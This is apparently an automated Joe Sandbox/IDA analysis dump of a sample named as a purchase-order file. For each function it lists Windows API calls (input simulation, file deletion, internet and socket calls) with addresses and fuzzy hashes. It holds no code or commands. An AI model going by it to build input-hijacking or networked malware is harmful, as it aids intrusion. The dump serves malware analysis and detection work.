                      • Instruction Fuzzy Hash: 2B418371B00209ABDF15DF54C952FEE7BF9AF48700F000029FA05A7292DB749E45CB62
                      APIs
                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00ADEF32
                      • GetLastError.KERNEL32(?,00000000), ref: 00ADEF58
                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00ADEF7D
                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00ADEFA9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CreateHardLink$DeleteErrorFileLast
                      • String ID:
                      • API String ID: 3321077145-0
                      • Opcode ID: e598f7504f425df8f3e395504951bbe7ceed058ec92c4d0033500f788e2d7c2c
                      • Instruction ID: 46c8c45cc2955287c9050597002ca139d9d3945ed9076ef46ebfb7f8d692fbbd
                      • Opcode Fuzzy Hash: e598f7504f425df8f3e395504951bbe7ceed058ec92c4d0033500f788e2d7c2c
                      • Instruction Fuzzy Hash: 1E411739600611DFCF11EF15C685A59BBE5EF89320B198499E846AF762CB34FD40CB91
                      APIs
                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AFB3E1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: InvalidateRect
                      • String ID:
                      • API String ID: 634782764-0
                      • Opcode ID: 32d5e8dc3414661a03114002cc91a957dc3dbebbdf29e0950a90ade93a498274
                      • Instruction ID: f57dbd6ccfc479fe6d048084e56f21f4eee67c919b4fba707cd757bbe91f5c01
                      • Opcode Fuzzy Hash: 32d5e8dc3414661a03114002cc91a957dc3dbebbdf29e0950a90ade93a498274
                      • Instruction Fuzzy Hash: 5831903466020CABEF249F98CE85BB87775AB05352F648612FB51DB5E2C730E9409B71
                      APIs
                      • ClientToScreen.USER32(?,?), ref: 00AFD617
                      • GetWindowRect.USER32(?,?), ref: 00AFD68D
                      • PtInRect.USER32(?,?,00AFEB2C), ref: 00AFD69D
                      • MessageBeep.USER32(00000000), ref: 00AFD70E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Rect$BeepClientMessageScreenWindow
                      • String ID:
                      • API String ID: 1352109105-0
                      • Opcode ID: 84fe680841f93bee930f589ad6f90acdda8edda2f4b599ecc22c12ded9a7d314
                      • Instruction ID: 7e109cf059f56e222e21493904a3c5d33ee9bca520383e562849b767abdfa96b
                      • Opcode Fuzzy Hash: 84fe680841f93bee930f589ad6f90acdda8edda2f4b599ecc22c12ded9a7d314
                      • Instruction Fuzzy Hash: F4415A30A10218DFCB52DF98D884BA9BBF6BB45305F1481AAF609DF251D730E841CB50
                      APIs
                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00AD44EE
                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00AD450A
                      • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00AD456A
                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00AD45C8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: dca12bbf99c875e1a962f2b1f54650fb551e74dafede31a6e6fe871d2c454def
                      • Instruction ID: dcbb9ec5aa6981d8c5b64920495dc73b264e2d6fd44b8b294b4910edbc54191f
                      • Opcode Fuzzy Hash: dca12bbf99c875e1a962f2b1f54650fb551e74dafede31a6e6fe871d2c454def
                      • Instruction Fuzzy Hash: 9A31E2B1A04298AFEF208B64A9087FE7BB69B5D314F04025BF483933C1CB749E44D762
                      APIs
                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AC4DE8
                      • __isleadbyte_l.LIBCMT ref: 00AC4E16
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00AC4E44
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00AC4E7A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                      • String ID:
                      • API String ID: 3058430110-0
                      • Opcode ID: e7149f95d94175e0ea4993f3516c433070e9e42041a6af2d9a4066ff2a6e6a2a
                      • Instruction ID: d4ceebad42b0ab1f6d5936799ddcedec978f8fb25dc862a43ec1371e8dbb258d
                      • Opcode Fuzzy Hash: e7149f95d94175e0ea4993f3516c433070e9e42041a6af2d9a4066ff2a6e6a2a
                      • Instruction Fuzzy Hash: 7631BE31600206AFDF229F74C855FEA7BAAFF49320F17852DE8218B1A1E730D850DB94
                      APIs
                      • GetForegroundWindow.USER32 ref: 00AF7AB6
                        • Part of subcall function 00AD69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AD69E3
                        • Part of subcall function 00AD69C9: GetCurrentThreadId.KERNEL32 ref: 00AD69EA
                        • Part of subcall function 00AD69C9: AttachThreadInput.USER32(00000000,?,00AD8127), ref: 00AD69F1
                      • GetCaretPos.USER32(?), ref: 00AF7AC7
                      • ClientToScreen.USER32(00000000,?), ref: 00AF7B00
                      • GetForegroundWindow.USER32 ref: 00AF7B06
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                      • String ID:
                      • API String ID: 2759813231-0
                      • Opcode ID: 21eda53070060770029fff8cced7f8c46bd45f1874026c69b08194907cbc1b15
                      • Instruction ID: 5b918819135cd635898520ee85cca2bbd798cd533f96c5157b4b9d4b59e710d2
                      • Opcode Fuzzy Hash: 21eda53070060770029fff8cced7f8c46bd45f1874026c69b08194907cbc1b15
                      • Instruction Fuzzy Hash: F7311071D00108AFCB00EFB9D9859EFBBF9EF55310B11846AE415E7251DB359E058BA0
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                      • GetCursorPos.USER32(?), ref: 00AFEFE2
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B0F3C3,?,?,?,?,?), ref: 00AFEFF7
                      • GetCursorPos.USER32(?), ref: 00AFF041
                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B0F3C3,?,?,?), ref: 00AFF077
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                      • String ID:
                      • API String ID: 2864067406-0
                      • Opcode ID: 439405e162395ae1de18cf9073b67bb6ccb01df375efeb18140a64f0e939a102
                      • Instruction ID: 3bf1fcf76baa129981ec7e738c3d211af3640420e657fd395e210efc0c80e1a8
                      • Opcode Fuzzy Hash: 439405e162395ae1de18cf9073b67bb6ccb01df375efeb18140a64f0e939a102
                      • Instruction Fuzzy Hash: 7E21BF35600128AFCB258F98CC98FFA7BB5EF49754F0440A9FA05972A2DB319D51DBA0
                      APIs
                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AE49B7
                        • Part of subcall function 00AE4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AE4A60
                        • Part of subcall function 00AE4A41: InternetCloseHandle.WININET(00000000), ref: 00AE4AFD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Internet$CloseConnectHandleOpen
                      • String ID:
                      • API String ID: 1463438336-0
                      • Opcode ID: 6e7fc32f9726c4047e05b698b264d6267f1eed2932a7802fd02abf6fd4484bae
                      • Instruction ID: 19d6824dde8c9a8686f8dc90856dc32f7c37422a17e4aac602502dcf6238f90c
                      • Opcode Fuzzy Hash: 6e7fc32f9726c4047e05b698b264d6267f1eed2932a7802fd02abf6fd4484bae
                      • Instruction Fuzzy Hash: 8C21A431640A45BFDB129F629C00FBBBBBDFB48711F14402AFA0597551EB71D811A794
                      APIs
                      • GetWindowLongW.USER32(?,000000EC), ref: 00AF88A3
                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AF88BD
                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AF88CB
                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00AF88D9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$Long$AttributesLayered
                      • String ID:
                      • API String ID: 2169480361-0
                      • Opcode ID: b04db9dafb3fa1413faecf7316b5edb4270383c1b89521dfc51d802315bf8c62
                      • Instruction ID: fa9c12fb4ccfa4e3f6744cd8e67c3407b16f225f6580e2496927dd5a92aa4287
                      • Opcode Fuzzy Hash: b04db9dafb3fa1413faecf7316b5edb4270383c1b89521dfc51d802315bf8c62
                      • Instruction Fuzzy Hash: 06118E32305515AFDB14AB68CD05FBA7BE9EF853A0F548119F916C72E2CB78AD00CB94
                      APIs
                      • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00AE906D
                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00AE907F
                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00AE908C
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE90A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorLastacceptselect
                      • String ID:
                      • API String ID: 385091864-0
                      • Opcode ID: 2d2d716863cb3b458f76aeff6d9b930020cff35c293f040e740cc182b55b917b
                      • Instruction ID: 2f11a629b02f5a6ce561cdf1016dcb283f13c6edf11789710a6fa50f723e64de
                      • Opcode Fuzzy Hash: 2d2d716863cb3b458f76aeff6d9b930020cff35c293f040e740cc182b55b917b
                      • Instruction Fuzzy Hash: 3C215475A001249FCB10DF69C985ADABBFCEF49710F40816AF849D7291DB749E41CB90
                      APIs
                        • Part of subcall function 00AD2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00AD18FD,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?), ref: 00AD2CB9
                        • Part of subcall function 00AD2CAA: lstrcpyW.KERNEL32(00000000,?,?,00AD18FD,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD2CDF
                        • Part of subcall function 00AD2CAA: lstrcmpiW.KERNEL32(00000000,?,00AD18FD,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?), ref: 00AD2D10
                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD1916
                      • lstrcpyW.KERNEL32(00000000,?,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD193C
                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD1970
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: lstrcmpilstrcpylstrlen
                      • String ID: cdecl
                      • API String ID: 4031866154-3896280584
                      • Opcode ID: 2eb33862c0016dacb9ec238092cd3939fceeab0eb15a73c7d54dee460f571ad5
                      • Instruction ID: d90f88ccdb2eec68ced1e565229e91f3a3e114704b7caf384eda7d52697edfef
                      • Opcode Fuzzy Hash: 2eb33862c0016dacb9ec238092cd3939fceeab0eb15a73c7d54dee460f571ad5
                      • Instruction Fuzzy Hash: E611BB3A200301BFDB15AF74D865EBA77B8FF44350B80902AF807CB2A0EB319951C7A1
                      APIs
                      • _free.LIBCMT ref: 00AC3D65
                        • Part of subcall function 00AB45EC: __FF_MSGBANNER.LIBCMT ref: 00AB4603
                        • Part of subcall function 00AB45EC: __NMSG_WRITE.LIBCMT ref: 00AB460A
                        • Part of subcall function 00AB45EC: RtlAllocateHeap.NTDLL(01360000,00000000,00000001,?,?,?,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB462F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AllocateHeap_free
                      • String ID:
                      • API String ID: 614378929-0
                      • Opcode ID: 3cde1a863a22e7530dc868071aac73072ee7daba5fa8b73411f13bb4909d0b30
                      • Instruction ID: b282e34a3dd9e9cc218409ecdf2fa378ecf288c382137774afdd96ca70e8228b
                      • Opcode Fuzzy Hash: 3cde1a863a22e7530dc868071aac73072ee7daba5fa8b73411f13bb4909d0b30
                      • Instruction Fuzzy Hash: 691194335016119BDF223FB4A945BE93BAC6F40360B518D2AF94A9A152DF358940C750
                      APIs
                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AD715C
                      • _memset.LIBCMT ref: 00AD717D
                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00AD71CF
                      • CloseHandle.KERNEL32(00000000), ref: 00AD71D8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CloseControlCreateDeviceFileHandle_memset
                      • String ID:
                      • API String ID: 1157408455-0
                      • Opcode ID: af61383b4881015c8070b82015a868cdf2c50f9d2dca0278268e754dc5ddb3ab
                      • Instruction ID: a1eea2d398c02212db288245066e30354a9717793d2c86a577f2fffaa65fd17a
                      • Opcode Fuzzy Hash: af61383b4881015c8070b82015a868cdf2c50f9d2dca0278268e754dc5ddb3ab
                      • Instruction Fuzzy Hash: BD11CA759012287AE7205B65AC4DFEFBABCEF45760F10429AF505E72D0D6744F808BA4
                      APIs
                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00AD13EE
                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00AD1409
                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00AD141F
                      • FreeLibrary.KERNEL32(?), ref: 00AD1474
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                      • String ID:
                      • API String ID: 3137044355-0
                      • Opcode ID: fb26d6dec7ec11f7900659f6d2e784b1470290a221c8508ede9da261c1e7d72d
                      • Instruction ID: 0f7ab863085de54abc81621eefba39c26ef5aaa55135b1ff4cdebd37109aa3f7
                      • Opcode Fuzzy Hash: fb26d6dec7ec11f7900659f6d2e784b1470290a221c8508ede9da261c1e7d72d
                      • Instruction Fuzzy Hash: C1216AF1A40209BBDB209F95ED88ADABBB8EF00744F40856BE52397250DB74EA44DB51
                      APIs
                        • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF282
                        • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF2A6
                      • gethostbyname.WSOCK32(?), ref: 00AE92F0
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE92FB
                      • _memmove.LIBCMT ref: 00AE9328
                      • inet_ntoa.WSOCK32(?), ref: 00AE9333
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                      • String ID:
                      • API String ID: 1504782959-0
                      • Opcode ID: 92027d6b011fa79d190c615a22493dabc0e6ff40aaa77c1041fc1578d2972d48
                      • Instruction ID: 901c725e4d550f5df8075337626d740bf923dc676a59442e93d15d098a937a25
                      • Opcode Fuzzy Hash: 92027d6b011fa79d190c615a22493dabc0e6ff40aaa77c1041fc1578d2972d48
                      • Instruction Fuzzy Hash: 13112B76A00109AFCF05FBA1CE56DEEB7B9EF14311B544065F506AB2A2DB30AE14CB61
                      APIs
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00ACC285
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ACC297
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ACC2AD
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ACC2C8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID:
                      • API String ID: 3850602802-0
                      • Opcode ID: f65b801152febe986deba83e051a3cd4094f5745c6f3853b03281b4afb29fe50
                      • Instruction ID: 7ec8d69bfc31d972248cd528b6f77f3db9ba607f5236cd67fdda0fefc7369a27
                      • Opcode Fuzzy Hash: f65b801152febe986deba83e051a3cd4094f5745c6f3853b03281b4afb29fe50
                      • Instruction Fuzzy Hash: 5711187A940218FFDB11DBD8C985FDDBBB8FB08710F214095EA05B7294D671AE10DB94
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00AD7C6C
                      • MessageBoxW.USER32(?,?,?,?), ref: 00AD7C9F
                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AD7CB5
                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AD7CBC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                      • String ID:
                      • API String ID: 2880819207-0
                      • Opcode ID: 2d3f058c560b3004b3bb8f1f6fe9b31fac9e513a743bfe8602fe999383a9e7a6
                      • Instruction ID: d23d223c5b1677fe6d5ac76bb7060dc91802a3384656e42a255cc4ea0e5f191c
                      • Opcode Fuzzy Hash: 2d3f058c560b3004b3bb8f1f6fe9b31fac9e513a743bfe8602fe999383a9e7a6
